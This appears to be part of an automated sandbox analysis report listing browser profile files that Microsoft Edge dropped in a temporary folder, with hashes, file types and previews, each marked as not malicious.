                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:JSON data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2
                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:[]

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Network\SCT Auditing Pending Reports~RF2e67e.TMP (copy)

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:JSON data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2
                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:[]

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Network\Trust Tokens

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):36864
                                                                                                                                                              Entropy (8bit):0.36515621748816035
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
                                                                                                                                                              MD5:25363ADC3C9D98BAD1A33D0792405CBF
                                                                                                                                                              SHA1:D06E343087D86EF1A06F7479D81B26C90A60B5C3
                                                                                                                                                              SHA-256:6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
                                                                                                                                                              SHA-512:CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.......X..g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Network\fb567f2b-288f-4830-8540-4dccbaa7249d.tmp

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:JSON data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2
                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:[]

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Nurturing\campaign_history

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):20480
                                                                                                                                                              Entropy (8bit):0.46731661083066856
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:TL1QAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3is25q0S9K0xHZ75fOV:TLiOUOq0afDdWec9sJf5Q7J5fc
                                                                                                                                                              MD5:E93ACF0820CA08E5A5D2D159729F70E3
                                                                                                                                                              SHA1:2C1A4D4924B9AEC1A796F108607404B000877C5D
                                                                                                                                                              SHA-256:F2267FDA7F45499F7A01186B75CEFB799F8D2BC97E2E9B5068952D477294302C
                                                                                                                                                              SHA-512:3BF36C20E04DCF1C16DC794E272F82F68B0DE43F16B4A9746B63B6D6BBC953B00BD7111CDA7AFE85CEBB2C447145483A382B15E2B0A5B36026C3441635D4E50C
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\README

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):182
                                                                                                                                                              Entropy (8bit):4.2629097520179995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:RGXKRjg0QwVIWRKXECSAV6jDyhjgHGAW+LB2Z4MKLFE1SwhiFAfXQmWyKBPMwRgK:z3frsUpAQQgHGwB26MK8Sw06fXQmWtRT
                                                                                                                                                              MD5:643E00B0186AA80523F8A6BED550A925
                                                                                                                                                              SHA1:EC4056125D6F1A8890FFE01BFFC973C2F6ABD115
                                                                                                                                                              SHA-256:A0C9ABAE18599F0A65FC654AD36251F6330794BEA66B718A09D8B297F3E38E87
                                                                                                                                                              SHA-512:D91A934EAF7D9D669B8AD4452234DE6B23D15237CB4D251F2C78C8339CEE7B4F9BA6B8597E35FE8C81B3D6F64AE707C68FF492903C0EDC3E4BAF2C6B747E247D
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:Microsoft Edge settings and storage represent user-selected preferences and information and MUST not be extracted, overwritten or modified except through Microsoft Edge defined APIs.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Session Storage\000001.dbtmp

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16
                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Session Storage\000003.log

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):61
                                                                                                                                                              Entropy (8bit):3.7273991737283296
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:S8ltHlS+QUl1ASEGhTFl:S85aEFl
                                                                                                                                                              MD5:9F7EADC15E13D0608B4E4D590499AE2E
                                                                                                                                                              SHA1:AFB27F5C20B117031328E12DD3111A7681FF8DB5
                                                                                                                                                              SHA-256:5C3A5B578AB9FE853EAD7040BC161929EA4F6902073BA2B8BB84487622B98923
                                                                                                                                                              SHA-512:88455784C705F565C70FA0A549C54E2492976E14643E9DD0A8E58C560D003914313DF483F096BD33EC718AEEC7667B8DE063A73627AA3436BA6E7E562E565B3F
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:*...#................version.1..namespace-..&f...............

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Session Storage\CURRENT (copy)

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16
                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Session Storage\LOG

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):261
                                                                                                                                                              Entropy (8bit):5.194855178635482
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:HEFS2s1qLTwi23fQr/DQM72KLlVEFSEFKn+q2PqLTwi23fQr/DQMxIFUv:ko2FwZC/LsoEF/v8wZCCFUv
                                                                                                                                                              MD5:6934DFD99E4BB8E0DFEEA0F40821919C
                                                                                                                                                              SHA1:834F22DD97A8806664ED6DEA011851E63F8ED5D8
                                                                                                                                                              SHA-256:3FCD11A0B7923D51531DFA4019A7873CBE9083A7ED030676CDBB6B9ED3478603
                                                                                                                                                              SHA-512:946391CF3079897DF41FFB289313736FF2E75142D3AE31CEC239A45EFD71D8184DB1218B16E6C8795BBDCAB744D511A83F9D6E294688704491CF94375946B4AB
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:2024/11/21-05:27:21.714 1608 Creating DB C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Session Storage since it was missing..2024/11/21-05:27:21.763 1608 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Session Storage/MANIFEST-000001.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Session Storage\MANIFEST-000001

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):41
                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Site Characteristics Database\000001.dbtmp

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16
                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Site Characteristics Database\000003.log

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):40
                                                                                                                                                              Entropy (8bit):3.473726825238924
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:41tt0diERGn:et084G
                                                                                                                                                              MD5:148079685E25097536785F4536AF014B
                                                                                                                                                              SHA1:C5FF5B1B69487A9DD4D244D11BBAFA91708C1A41
                                                                                                                                                              SHA-256:F096BC366A931FBA656BDCD77B24AF15A5F29FC53281A727C79F82C608ECFAB8
                                                                                                                                                              SHA-512:C2556034EA51ABFBC172EB62FF11F5AC45C317F84F39D4B9E3DDBD0190DA6EF7FA03FE63631B97AB806430442974A07F8E81B5F7DC52D9F2FCDC669ADCA8D91F
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.On.!................database_metadata.1

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Site Characteristics Database\CURRENT (copy)

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16
                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Site Characteristics Database\LOG

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):289
                                                                                                                                                              Entropy (8bit):5.044488801382113
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:HEFSQXs1qLTwi23fQr/TUh2gr52KLlVEFSRnM+q2PqLTwi23fQr/TUh2ghZIFUv:koCFwZCIhHJLsoRM+v8wZCIhHh2FUv
                                                                                                                                                              MD5:3BC5F6ED6DD397EBAA82220D2BB5465B
                                                                                                                                                              SHA1:2688D44339C4F52A01BDB3AE2F18D16A2105329D
                                                                                                                                                              SHA-256:2E37313374DC85D2A23B5E4C2DEE81D316318EE2BFAFC11204C62C9DE15F21A4
                                                                                                                                                              SHA-512:09C3468D72E4CFB95D164391510D25B22BFE736FB4CC3EF06A6224233091DE00782E080405E28D9E93CC949FB93A330227C0B9A81BCC31CA655C0EB1DDAD27D9
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:2024/11/21-05:27:21.041 1e1c Creating DB C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Site Characteristics Database since it was missing..2024/11/21-05:27:21.222 1e1c Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Site Characteristics Database/MANIFEST-000001.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Site Characteristics Database\MANIFEST-000001

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):41
                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Sync Data\LevelDB\000001.dbtmp

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16
                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Sync Data\LevelDB\000003.log

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):46
                                                                                                                                                              Entropy (8bit):4.019797536844534
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:sLollttz6sjlGXU2tkn:qolXtWswXU2tkn
                                                                                                                                                              MD5:90881C9C26F29FCA29815A08BA858544
                                                                                                                                                              SHA1:06FEE974987B91D82C2839A4BB12991FA99E1BDD
                                                                                                                                                              SHA-256:A2CA52E34B6138624AC2DD20349CDE28482143B837DB40A7F0FBDA023077C26A
                                                                                                                                                              SHA-512:15F7F8197B4FC46C4C5C2570FB1F6DD73CB125F9EE53DFA67F5A0D944543C5347BDAB5CCE95E91DD6C948C9023E23C7F9D76CFF990E623178C92F8D49150A625
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:...n'................_mts_schema_descriptor...

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Sync Data\LevelDB\CURRENT (copy)

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16
                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Sync Data\LevelDB\LOG

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):265
                                                                                                                                                              Entropy (8bit):5.197944585609627
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:HEFSMI81qLTwi23fQr/Zx2KLlVEFSX+q2PqLTwi23fQr/RIFUv:kopVwZCBVLsoX+v8wZCmFUv
                                                                                                                                                              MD5:15A3F600FD984C22762C1A6125914483
                                                                                                                                                              SHA1:41F2B9F7BADF38E5735C27E37027A1FC15A30D5F
                                                                                                                                                              SHA-256:B6F158498D492CC120F11C3879320FCCBF3157A04661E07DE787B3F66EBEF197
                                                                                                                                                              SHA-512:0B651B4579D6501CCF17F92BB2BC10BCB2ED692F4E298A292668F52E7A44A15EF5BFBE4F46BE611BECEE9141984F2C08649171A74832AD08A66FF098B8FFE3B0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:2024/11/21-05:27:21.102 1dcc Creating DB C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Sync Data\LevelDB since it was missing..2024/11/21-05:27:21.130 1dcc Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Sync Data\LevelDB/MANIFEST-000001.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Sync Data\LevelDB\MANIFEST-000001

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):41
                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Top Sites

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):20480
                                                                                                                                                              Entropy (8bit):0.3528485475628876
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:TLiN6CZhDu6MvDOF5yEHFxOUwa5qguYZ75fOSiPe2d:TLiwCZwE8I6Uwcco5fBtC
                                                                                                                                                              MD5:F2B4FB2D384AA4E4D6F4AEB0BBA217DC
                                                                                                                                                              SHA1:2CD70CFB3CE72D9B079170C360C1F563B6BF150E
                                                                                                                                                              SHA-256:1ECC07CD1D383472DAD33D2A5766625009EA5EACBAEDE2417ADA1842654CBBC8
                                                                                                                                                              SHA-512:48D03991660FA1598B3E002F5BC5F0F05E9696BCB2289240FA8CCBB2C030CDD23245D4ECC0C64DA1E7C54B092C3E60AE0427358F63087018BF0E6CEDC471DD34
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g.....4....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Visited Links

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):131072
                                                                                                                                                              Entropy (8bit):0.002095330713584969
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:ImtVSstl:IiVSk
                                                                                                                                                              MD5:319655F3A91BE555AB83426E35998502
                                                                                                                                                              SHA1:41B4DCB192A115F52F44646DEAADC958FF2F8570
                                                                                                                                                              SHA-256:78E3F4BE4A5419D35A16F87276687DAE95404C4D77443E88107B797BA97802C8
                                                                                                                                                              SHA-512:EAE30ACA6321B2D5799DB71E078F4E5D687B384FAC8A5206E1CD1387B6029D5DFB1A806C00F3D62412D0E287EF536E0A5AC416CF3329613DED90D9168F5BF0D9
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:VLnk.....?.........`(L..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Web Data

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 87, cookie 0x36, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):178176
                                                                                                                                                              Entropy (8bit):0.9401384989520177
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:Qrb2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+c:Q/2qOB1nxCkvSAELyKOMq+c
                                                                                                                                                              MD5:6817EEA7CE56E1AB1ECF93C090727E0F
                                                                                                                                                              SHA1:49A10B3D157FB49768284F68335CC7B378FB13B4
                                                                                                                                                              SHA-256:FF7B98237D2FA7537470A573B9FD12D9C656EDACC0949AA12B75970528F650CD
                                                                                                                                                              SHA-512:6E14A0B0A47B493493F6C0C8C2A15028C0C1D53E247D1FB2D227DC772ACFB6ADF2B74CBC8FB223156A1D39A1295FFF7EC054E9BE51DBF7BCE61CC597510C4EAE
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:SQLite format 3......@ .......W...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\Web Data-journal

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2568
                                                                                                                                                              Entropy (8bit):0.06569804787746028
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:s/El1lOtlu:s/E7
                                                                                                                                                              MD5:E94343720FFDE90DF8BEB182292098F0
                                                                                                                                                              SHA1:8A33CE84D2D7C920B12C3B4FB290AF717711D40F
                                                                                                                                                              SHA-256:F764DCFAFF816B41E15C18E218BA0F3BCA8E0B6072320161E85A31DA7DBCD710
                                                                                                                                                              SHA-512:6B3879EC686E904BDD3A1DFBA928751B1665365666C8D52F04C8FB1CD54F0D729E85C6DE30A4343307D629F7871FF60A62602E450AFB31755D30BB8B481F3A1E
